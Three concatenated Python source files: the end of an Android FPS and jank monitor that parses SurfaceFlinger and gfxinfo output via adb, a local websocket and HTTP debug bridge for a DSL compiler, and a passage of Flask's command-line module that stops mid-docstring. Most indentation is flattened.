if not is_first:
timestamps = first_timestamp + timestamps
self.last_timestamp = timestamps[-1][1]
is_first = False
else:
                        # Two cases: 1) the activity changed but the old activity still exists, so the
                        # fetched timestamps are not empty but are all <= last_timestamp;
                        # 2) the activity did not change and nothing was refreshed
is_first = True
cur_focus_window = self.get_focus_activity()
if self.focus_window != cur_focus_window:
self.focus_window = cur_focus_window
continue
logger.debug(timestamps)
self.data_queue.put((refresh_period, timestamps,time.time()))
time_consume = time.time() - before
delta_inter = self.frequency - time_consume
if delta_inter > 0:
time.sleep(delta_inter)
except:
logger.error("an exception hanpend in fps _collector_thread , reason unkown!")
s = traceback.format_exc()
logger.debug(s)
if self.fps_queue:
self.fps_queue.task_done()
self.data_queue.put(u'Stop')
def _clear_surfaceflinger_latency_data(self):
"""Clears the SurfaceFlinger latency data.
Returns:
True if SurfaceFlinger latency is supported by the device, otherwise
False.
"""
# The command returns nothing if it is supported, otherwise returns many
# lines of result just like 'dumpsys SurfaceFlinger'.
if self.focus_window == None:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency-clear')
else:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency-clear %s' % self.focus_window)
return not len(results)
def _get_surfaceflinger_frame_data(self):
"""Returns collected SurfaceFlinger frame timing data.
return:(16.6,[[t1,t2,t3],[t4,t5,t6]])
Returns:
A tuple containing:
- The display's nominal refresh period in seconds.
- A list of timestamps signifying frame presentation times in seconds.
The return value may be (None, None) if there was no data collected (for
example, if the app was closed before the collector thread has finished).
"""
# shell dumpsys SurfaceFlinger --latency <window name>
# prints some information about the last 128 frames displayed in
# that window.
# The data returned looks like this:
# 16954612
# 7657467895508 7657482691352 7657493499756
# 7657484466553 7657499645964 7657511077881
# 7657500793457 7657516600576 7657527404785
# (...)
#
# The first line is the refresh period (here 16.95 ms), it is followed
# by 128 lines w/ 3 timestamps in nanosecond each:
# A) when the app started to draw
# B) the vsync immediately preceding SF submitting the frame to the h/w
# C) timestamp immediately after SF submitted that frame to the h/w
#
# The difference between the 1st and 3rd timestamp is the frame-latency.
# An interesting data is when the frame latency crosses a refresh period
# boundary, this can be calculated this way:
#
# ceil((C - A) / refresh-period)
#
# (each time the number above changes, we have a "jank").
# If this happens a lot during an animation, the animation appears
# janky, even if it runs at 60 fps in average.
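        #
        # A quick worked example with the sample rows above (values in ns, purely
        # illustrative): for the first row A = 7657467895508 and C = 7657493499756,
        # so C - A = 25604248 ns and ceil(25604248 / 16954612) = 2 refresh periods;
        # if the next frame yields 3 instead of 2, that transition counts as one
        # "jank".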
#
        # Result of dumpsys SurfaceFlinger --latency on a Google Pixel 2 with Android 8.0:
# 16666666
# 0 0 0
# 0 0 0
# 0 0 0
# 0 0 0
        # On a Huawei Honor 9 with Android 8.0 the output of dumpsys SurfaceFlinger --latency looks normal, but the data updates very slowly and cannot be used to compute fps either:
# 16666666
# 9223372036854775807 3618832932780 9223372036854775807
# 9223372036854775807 3618849592155 9223372036854775807
# 9223372036854775807 3618866251530 9223372036854775807
        # Result of dumpsys SurfaceFlinger --latency <window> on a Google Pixel 2 with Android 8.0:
# C:\Users\luke01>adb -s HT7B81A05143 shell dumpsys SurfaceFlinger --latency window_name
# 16666666
refresh_period = None
timestamps = []
nanoseconds_per_second = 1e9
pending_fence_timestamp = (1 << 63) - 1
if self.device.adb.get_sdk_version() >= 26:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency %s'%self.focus_window)
results = results.replace("\r\n","\n").splitlines()
refresh_period = int(results[0]) / nanoseconds_per_second
results = self.device.adb.run_shell_cmd('dumpsys gfxinfo %s framestats'%self.package_name)
# logger.debug(results)
            # Wrap the result of `dumpsys gfxinfo package_name framestats` into the same
            # shape as the result of `dumpsys SurfaceFlinger --latency`,
            # so the later fps/jank calculation can handle both uniformly
results = results.replace("\r\n","\n").splitlines()
if not len(results):
return (None, None)
isHaveFoundWindow = False
PROFILEDATA_line = 0
for line in results:
if not isHaveFoundWindow:
if "Window" in line and self.focus_window in line:
isHaveFoundWindow = True
# logger.debug("Window line:"+line)
if not isHaveFoundWindow:
continue
if "PROFILEDATA" in line:
PROFILEDATA_line +=1
fields = []
fields = line.split(",")
if fields and '0' == fields[0]:
# logger.debug(line)
                    # get the INTENDED_VSYNC, VSYNC and FRAME_COMPLETED times; VSYNC is used to compute fps and jank
timestamp = [int(fields[1]),int(fields[2]),int(fields[13])]
if timestamp[1] == pending_fence_timestamp:
continue
timestamp = [_timestamp / nanoseconds_per_second for _timestamp in timestamp]
timestamps.append(timestamp)
                # if we have reached the next window, stop
if 2 == PROFILEDATA_line:
break
else:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency %s'%self.focus_window)
results = results.replace("\r\n","\n").splitlines()
logger.debug("dumpsys SurfaceFlinger --latency result:")
logger.debug(results)
if not len(results):
return (None, None)
if not results[0].isdigit():
return (None, None)
try:
refresh_period = int(results[0]) / nanoseconds_per_second
except Exception as e:
logger.exception(e)
return (None, None)
# If a fence associated with a frame is still pending when we query the
# latency data, SurfaceFlinger gives the frame a timestamp of INT64_MAX.
# Since we only care about completed frames, we will ignore any timestamps
# with this value.
for line in results[1:]:
fields = line.split()
if len(fields) != 3:
continue
timestamp = [int(fields[0]),int(fields[1]),int(fields[2])]
if timestamp[1] == pending_fence_timestamp:
continue
timestamp = [_timestamp / nanoseconds_per_second for _timestamp in timestamp]
timestamps.append(timestamp)
return (refresh_period, timestamps)
def _get_surface_stats_legacy(self):
"""Legacy method (before JellyBean), returns the current Surface index
and timestamp.
Calculate FPS by measuring the difference of Surface index returned by
SurfaceFlinger in a period of time.
Returns:
Dict of {page_flip_count (or 0 if there was an error), timestamp}.
"""
cur_surface = None
timestamp = datetime.datetime.now()
        # this command may require root
ret = self.device.adb.run_shell_cmd("service call SurfaceFlinger 1013")
if not ret :
return None
        match = re.search(r'^Result: Parcel\((\w+)', ret)
if match :
cur_surface = int(match.group(1), 16)
return {'page_flip_count': cur_surface,'timestamp': timestamp}
return None
class FPSMonitor(Monitor):
    '''FPS monitor'''
def __init__(self, device_id, package_name = None,frequency=1.0,timeout =24 * 60 * 60,fps_queue=None,jank_threshold=166, use_legacy = False):
        '''Constructor
        :param str device_id: device id
        :param float frequency: sampling frequency for the frame rate, 1 second by default
        :param int jank_threshold: threshold for computing the jank value, in milliseconds; defaults to 10 vsync periods, i.e. 166ms
        :param bool use_legacy: when True, page_flip is always used to measure the frame rate, which reflects the refresh rate of the full screen.
            When not specified, on systems above 4.1 the refresh rate of the currently focused Activity is measured
        '''
self.use_legacy = use_legacy
self.frequency = frequency # 取样频率
self.jank_threshold = jank_threshold
self.device = AndroidDevice(device_id)
self.timeout = timeout
if not package_name:
package_name = self.device.adb.get_foreground_process()
self.package = package_name
self.fpscollector = SurfaceStatsCollector(self.device, self.frequency, package_name,fps_queue,self.jank_threshold, self.use_legacy)
def start(self,start_time):
        '''Start the FPSMonitor
        '''
if not RuntimeData.package_save_path:
RuntimeData.package_save_path = os.path.join(os.path.abspath(os.path.join(os.getcwd(), "../..")),'results', self.package, start_time)
if not os.path.exists(RuntimeData.package_save_path):
os.makedirs(RuntimeData.package_save_path)
self.start_time = start_time
self.fpscollector.start(start_time)
logger.debug('FPS monitor has start!')
def stop(self):
        '''Stop the FPSMonitor
        '''
self.fpscollector.stop()
logger.debug('FPS monitor has stop!')
def save(self):
pass
def parse(self, file_path):
        '''Parse
        :param str file_path: path of the data file to parse
        '''
pass
def get_fps_collector(self):
        '''Get the fps collector, which holds the list of time/fps/jank values
        :return: fps collector
        :rtype: SurfaceStatsCollector
        '''
return self.fpscollector
if __name__ == '__main__':
# tulanduo android8.0 api level 27
monitor = FPSMonitor('TC79SSDMO7HEY5Z9',"com.alibaba.ailabs.genie.smartapp",1)
# mate 9 android8.0
# monitor = FPSMonitor('MKJNW18226007860',"com.sankuai.meituan",2)
# android8.0 Google Pixel 2
# monitor = FPSMonitor('HT7B81A05143',package_name = "com.alibaba.ailibs.genie.contacts",1)
monitor.start(TimeUtils.getCurrentTimeUnderline())
time.sleep(600)
monitor.stop()
|
debug_bridge.py
|
import os
import time
import base64
import datetime
import types
import websockets
import threading
from queue import Queue
import http.server
from jinja2 import Template
from base64 import b64encode
import asyncio
import qrcode
import qrcode.image
import json
import netifaces
import logging
import subprocess
try:
import importlib.resources as pkg_resources
except ImportError:
import importlib_resources as pkg_resources
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler, FileSystemEvent
from common import RawInput, CompileResult
def get_v4_ip():
try:
iface = netifaces.ifaddresses('eth0')
except ValueError:
iface = netifaces.ifaddresses('en0')
if iface is None:
        raise Exception('Failed to get IP address')
return iface[netifaces.AF_INET][0]['addr']
def get_ip():
return get_v4_ip()
def _get_dir_name_on_path(path: str) -> str:
"""通过路径获取文件夹名"""
prefix = path.split('/')
if len(prefix) == 1:
return '.'
else:
return '/'.join(prefix[:-1])
def _get_file_name_on_path(path: str) -> str:
"""通过路径获取文件名"""
return path.split('/')[-1]
class _DslFileChangeListener(FileSystemEventHandler):
def __init__(self, dsl_file_name, callback_function) -> None:
super().__init__()
self.file_name = dsl_file_name
self.callback = callback_function
assert type(callback_function) is types.MethodType
def on_modified(self, event: FileSystemEvent):
if not event.is_directory:
            # it is a file
if _get_file_name_on_path(event.src_path) == self.file_name:
                # the modified file is the dsl file we were given, so fire the callback
self.callback()
class _WsResponse:
TYPE_COMPILED = 'compiled'
TYPE_MSG = 'msg'
TYPE_EXT_CMD = 'ext'
code: int
data: str
def __init__(self, code, data, rtype: str) -> None:
super().__init__()
self.code = code
self.data = data
self.rtype = rtype
def to_json(self):
return json.dumps({
'code': self.code,
'type': self.rtype,
'data': self.data
})
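# For reference, a compiled-result message serialized by _WsResponse.to_json()
# looks like the following (field values are illustrative only):
#   {"code": 0, "type": "compiled", "data": "<compiled string>"}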
class _DebugServer(threading.Thread):
_first_time = True
_http_server = None
_ws_server = None
def __init__(self, q: Queue) -> None:
super().__init__()
self.q = q
self.wss_qr = None
self.wss_addr = None
def run(self):
while True:
logging.debug('Wait for next msg...')
new_result = self.q.get()
logging.debug(f'Got msg! ->>>>>>> {new_result}')
if type(new_result) is CompileResult:
if self._first_time:
self._first_time = False
self._real_run(new_result)
else:
self._http_server.shutdown()
self._http_server.thread.join()
self._publish_local_http(new_result, self.wss_qr, self.wss_addr, True)
self._update_wss(new_result)
if new_result == 'quit':
                # quitting: shut down the servers so the ports are not left occupied by an abnormal exit
if self._http_server:
self._http_server.shutdown()
self._http_server.thread.join()
                    logging.debug('http server stopped')
if self._ws_server:
self._ws_server.shutdown()
                    logging.debug('websocket server stopped')
break
def _update_wss(self, new_result):
self._ws_server.broadcast_new_data(new_result)
def _real_run(self, result):
self._publish_wss(result)
self._publish_local_http(result, self.wss_qr, self.wss_addr)
def _publish_wss(self, result):
"""发布一个wss,用于广播编译数据,一个新的client连接后将会收到当前最新的编译数据
一个编译数据更新后,所有的client也能及时获取到最新的编译数据"""
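        # Tiny text protocol handled by handle_client below (messages are plain
        # strings; examples illustrative): a client sends "ask" to be pushed the
        # latest compiled data again, or "ext:<payload>" to have <payload>
        # broadcast to every connected client as an EXT command; anything else
        # receives a {"code": -1, ...} error response.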
port = 8891
tmp_png_file = 'tmp_qr.png'
ws_address = f'ws://{get_ip()}:{port}'
qrcode.make(ws_address).save(tmp_png_file)
class WsServer:
thread = None
clients = {}
server = None
latest_result = None
async def _broadcast_new_data(self):
for client in self.clients.values():
await self._send_compiled_string(client)
def broadcast_new_data(self, new_result):
self.latest_result = new_result
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
asyncio.get_event_loop().run_until_complete(self._broadcast_new_data())
def run(self) -> None:
async def handle_client(websocket, path):
try:
client_id = websocket.remote_address
if client_id not in self.clients.keys():
self.clients[client_id] = websocket
                        # 1st: send the latest data
logging.debug(f'new client connected! -->>> {client_id}')
await self._send_compiled_string(websocket)
                        # 2nd: listen for what the client wants
while True:
logging.debug(f'listen for client -->>> {client_id}')
msg = await websocket.recv()
logging.debug(f"< {msg}")
if msg == 'ask':
                                # received the 'ask' command, reply with the latest data
logging.debug('client ask the latest data')
await self._send_compiled_string(websocket)
                            elif str(msg).startswith('ext:'):
logging.debug('client want set new ext to the mobile')
await self._do_ext_command(str(msg)[4:])
else:
                                logging.warning('unsupported command came in, check it')
resp = _WsResponse(-1, 'not support command', _WsResponse.TYPE_MSG)
await websocket.send(resp.to_json())
except websockets.ConnectionClosedError:
del self.clients[client_id]
logging.debug(f'connection lose <<< {client_id}')
except websockets.ConnectionClosedOK:
del self.clients[client_id]
logging.debug(f'connection closed <<< {client_id}')
self.latest_result = result
new_loop = asyncio.new_event_loop()
asyncio.set_event_loop(new_loop)
logging.getLogger('asyncio').setLevel(logging.ERROR)
logging.getLogger('asyncio.coroutines').setLevel(logging.ERROR)
logging.getLogger('websockets.server').setLevel(logging.ERROR)
logging.getLogger('websockets.protocol').setLevel(logging.ERROR)
self.server = websockets.serve(handle_client, get_ip(), port)
logging.debug(f'publish local ws service on -->>> {ws_address}')
asyncio.get_event_loop().run_until_complete(self.server)
asyncio.get_event_loop().run_forever()
def shutdown(self):
self.server.ws_server.close()
async def _send_compiled_string(self, client):
logging.debug('tell client latest compiled string ...')
resp = _WsResponse(0, self.latest_result.compiled_str, _WsResponse.TYPE_COMPILED)
await client.send(f"{resp.to_json()}")
logging.debug('tell client latest compiled string --->>> DONE')
async def _do_ext_command(self, ext: str):
logging.debug('send new ext data to client ...')
resp = _WsResponse(0, ext, _WsResponse.TYPE_EXT_CMD)
clts = self.clients.values()
if len(clts) > 0:
for c in clts:
await c.send(f'{resp.to_json()}')
logging.debug('send new ext data to client --->>> DONE')
self._ws_server = WsServer()
self._ws_server.thread = threading.Thread(None, self._ws_server.run)
self._ws_server.thread.start()
with open(tmp_png_file, 'rb') as image_file:
encoded_string = str(base64.b64encode(image_file.read()), encoding='utf-8')
os.remove(tmp_png_file)
self.wss_qr = encoded_string
self.wss_addr = ws_address
def _publish_local_http(self, result: CompileResult, qr_64: str, wss_addr: str, update=False):
"""发布一个本地http server用来发布提供编译信息的html"""
now = datetime.datetime.now()
now_string = now.strftime('%Y-%m-%d %H:%M:%S.%f')
class _HttpHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
                # {{ variable }}
                # {% statement %}
template_string = pkg_resources.read_text('res', 'debug_info.html.jinja2')
template = Template(template_string)
self.wfile.write(bytes(template.render(cstr=result.compiled_str,
cjson=b64encode(bytes(result.raw_json, encoding='utf-8')).decode(
'utf-8'),
now_time=now_string,
wss=wss_addr,
img_64=qr_64,
md5=result.meta_info.json_md5,
cli_ver=result.meta_info.cli_ver,
runtime_ver=result.meta_info.runtime_ver), encoding='utf-8'))
class _HttpServer(http.server.HTTPServer):
thread = None
def __init__(self):
server_address = ('', 8000)
super().__init__(server_address, _HttpHandler)
def run(self):
try:
url = f'http://{get_ip()}:{str(self.server_port)}'
                    logging.debug(f'Local debug info published: {url}')
if update is False:
t = threading.Thread(target=self.delay_open_url, args=(url,))
t.daemon = True
t.start()
self.serve_forever()
finally:
                    logging.debug('Local debug server stopped')
self.server_close()
@staticmethod
def delay_open_url(url):
time.sleep(2)
logging.debug('try open web page')
subprocess.Popen(['open', url])
self._http_server = _HttpServer()
self._http_server.thread = threading.Thread(None, self._http_server.run)
self._http_server.thread.start()
class DebugBridge:
raw_input: RawInput
dog = None
dbserver = None
def __init__(self, raw: RawInput) -> None:
self.raw_input = raw
self.queue = Queue(2)
def update(self, result: CompileResult):
self.queue.put(result)
def _on_dsl_change(self):
logging.debug('changed')
from compiler import CompileTask
c = CompileTask(self.raw_input, self)
try:
c.compile()
except Exception as e:
            logging.error(f'ERROR >>> compile error, please check\n{e}')
def _monitor_file(self):
event_handler = _DslFileChangeListener(_get_file_name_on_path(self.raw_input.src_file), self._on_dsl_change)
self.dog = Observer()
self.dog.schedule(event_handler, _get_dir_name_on_path(self.raw_input.src_file), recursive=False)
self.dog.start()
def _open_bridge(self):
self._monitor_file()
self.dbserver = _DebugServer(self.queue)
self.dbserver.daemon = True
self.dbserver.start()
def run(self, result: CompileResult):
self.queue.put(result)
self._open_bridge()
        logging.debug('Type q then Enter to stop debugging')
while True:
try:
user_input = input()
if str(user_input).lower() == 'q':
self.dog.stop()
self.queue.put('quit')
time.sleep(1)
exit(2)
            except (InterruptedError, KeyboardInterrupt):
exit(3)
|
cli.py
|
# -*- coding: utf-8 -*-
"""
flask.cli
~~~~~~~~~
A simple command line application to run flask apps.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
from __future__ import print_function
import ast
import inspect
import os
import re
import ssl
import sys
import traceback
from functools import update_wrapper
from operator import attrgetter
from threading import Lock, Thread
import click
from werkzeug.utils import import_string
from . import __version__
from ._compat import getargspec, iteritems, reraise, text_type
from .globals import current_app
from .helpers import get_debug_flag, get_env, get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ("app", "application"):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for k, v in iteritems(module.__dict__) if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
'Detected multiple Flask applications in module "{module}". Use '
'"FLASK_APP={module}:name" to specify the correct '
"one.".format(module=module.__name__)
)
# Search for app factory functions.
for attr_name in ("create_app", "make_app"):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
'Detected factory "{factory}" in module "{module}", but '
"could not call it without arguments. Use "
"\"FLASK_APP='{module}:{factory}(args)'\" to specify "
"arguments.".format(factory=attr_name, module=module.__name__)
)
raise NoAppException(
'Failed to find Flask application or factory in module "{module}". '
'Use "FLASK_APP={module}:name to specify one.'.format(module=module.__name__)
)
def call_factory(script_info, app_factory, arguments=()):
"""Takes an app factory, a ``script_info` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
args_spec = getargspec(app_factory)
arg_names = args_spec.args
arg_defaults = args_spec.defaults
if "script_info" in arg_names:
return app_factory(*arguments, script_info=script_info)
elif arguments:
return app_factory(*arguments)
elif not arguments and len(arg_names) == 1 and arg_defaults is None:
return app_factory(script_info)
return app_factory()
def _called_with_wrong_args(factory):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param factory: the factory function that was called
:return: true if the call failed
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is factory.__code__:
# in the factory, it was called successfully
return False
tb = tb.tb_next
# didn't reach the factory
return True
finally:
del tb
def find_app_by_string(script_info, module, app_name):
"""Checks if the given string is a variable name or a function. If it is a
function, it checks for specified arguments and whether it takes a
``script_info`` argument and calls the function with the appropriate
arguments.
"""
from flask import Flask
match = re.match(r"^ *([^ ()]+) *(?:\((.*?) *,? *\))? *$", app_name)
if not match:
raise NoAppException(
'"{name}" is not a valid variable name or function '
"expression.".format(name=app_name)
)
name, args = match.groups()
try:
attr = getattr(module, name)
except AttributeError as e:
raise NoAppException(e.args[0])
if inspect.isfunction(attr):
if args:
try:
args = ast.literal_eval("({args},)".format(args=args))
except (ValueError, SyntaxError) as e:
raise NoAppException(
"Could not parse the arguments in "
'"{app_name}".'.format(e=e, app_name=app_name)
)
else:
args = ()
try:
app = call_factory(script_info, attr, args)
except TypeError as e:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
'{e}\nThe factory "{app_name}" in module "{module}" could not '
"be called with the specified arguments.".format(
e=e, app_name=app_name, module=module.__name__
)
)
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
"A valid Flask application was not obtained from "
'"{module}:{app_name}".'.format(module=module.__name__, app_name=app_name)
)
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
if os.path.splitext(path)[1] == ".py":
path = os.path.splitext(path)[0]
if os.path.basename(path) == "__init__":
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, "__init__.py")):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return ".".join(module_name[::-1])
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[-1].tb_next:
raise NoAppException(
'While importing "{name}", an ImportError was raised:'
"\n\n{tb}".format(name=module_name, tb=traceback.format_exc())
)
elif raise_if_not_found:
raise NoAppException('Could not import "{name}".'.format(name=module_name))
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
message = "Flask %(version)s\nPython %(python_version)s"
click.echo(
message % {"version": __version__, "python_version": sys.version},
color=ctx.color,
)
ctx.exit()
version_option = click.Option(
["--version"],
help="Show the flask version",
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True,
)
class DispatchingApp(object):
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=False):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
reraise(*exc_info)
def _load_unlocked(self):
__traceback_hide__ = True
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
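# --- Illustrative sketch (not part of Flask) --------------------------------
# Any zero-argument callable returning a Flask app can be wrapped. With lazy
# loading the import runs in a background thread and any error is re-raised
# on the first request; with eager loading it happens immediately. "make_app"
# is a hypothetical factory used only for this example.
def _example_dispatching_app(make_app, environ, start_response):
    app = DispatchingApp(make_app, use_eager_loading=True)
    return app(environ, start_response)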
class ScriptInfo(object):
"""Help object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as a click object.
"""
def __init__(self, app_import_path=None, create_app=None):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get("FLASK_APP")
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just return the already loaded app.
"""
__traceback_hide__ = True
if self._loaded_app is not None:
return self._loaded_app
app = None
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (self.app_import_path.split(":", 1) + [None])[:2]
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ("wsgi.py", "app.py"):
import_name = prepare_import(path)
app = locate_app(self, import_name, None, raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
"Could not locate a Flask application. You did not provide "
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
debug = get_debug_flag()
# Update the app's debug flag through the descriptor so that other
# values repopulate as well.
if debug is not None:
app.debug = debug
self._loaded_app = app
return app
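# --- Illustrative sketch (not part of Flask) --------------------------------
# ScriptInfo resolves the same "module:attr" strings that "flask run" accepts.
# "hello:app" is a hypothetical import path, not a real module.
def _example_load_app():
    info = ScriptInfo(app_import_path="hello:app")
    return info.load_app()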
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
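# --- Illustrative sketch (not part of Flask) --------------------------------
# A command wrapped with with_appcontext can use current_app directly because
# the decorator pushes an application context before invoking the callback.
# "example-name" is a hypothetical command added only for illustration.
@click.command("example-name")
@with_appcontext
def _example_show_name():
    click.echo(current_app.name)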
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault("cls", AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this.
For information on why this is useful, see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands will be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(
self,
add_default_commands=True,
create_app=None,
add_version_option=True,
load_dotenv=True,
**extra
):
params = list(extra.pop("params", None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points("flask.commands"):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# We load built-in commands first as these should always be the
# same no matter what the app does. If the app does want to
# override this it needs to make a custom instance of this group
# and not attach the default commands.
#
# This also means that the script stays functional in case the
# application completely fails.
rv = AppGroup.get_command(self, ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
try:
rv = info.load_app().cli.get_command(ctx, name)
if rv is not None:
return rv
except NoAppException:
pass
def list_commands(self, ctx):
self._load_plugin_commands()
# The commands available is the list of both the application (if
# available) plus the builtin commands.
rv = set(click.Group.list_commands(self, ctx))
info = ctx.ensure_object(ScriptInfo)
try:
rv.update(info.load_app().cli.list_commands(ctx))
except Exception:
# Here we intentionally swallow all exceptions as we don't
# want the help page to break if the app does not exist.
# If someone attempts to use the command we try to create
# the app again and this will give us the error.
# However, we will not do so silently because that would confuse
# users.
traceback.print_exc()
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ["FLASK_RUN_FROM_CLI"] = "true"
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get("obj")
if obj is None:
obj = ScriptInfo(create_app=self.create_app)
kwargs["obj"] = obj
kwargs.setdefault("auto_envvar_prefix", "FLASK")
return super(FlaskGroup, self).main(*args, **kwargs)
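# --- Illustrative sketch (not part of Flask) --------------------------------
# The "advanced use case" mentioned in the FlaskGroup docstring: a custom
# script builds its own group around an app factory. "create_my_app" is a
# hypothetical factory supplied by the caller.
def _example_custom_cli(create_my_app):
    return FlaskGroup(
        create_app=lambda script_info: create_my_app(),
        help="Management script for the hypothetical application.",
    )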
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
Changes the current working directory to the location of the first file
found, with the assumption that it is in the top level project directory
and will be where the Python path should import local packages from.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
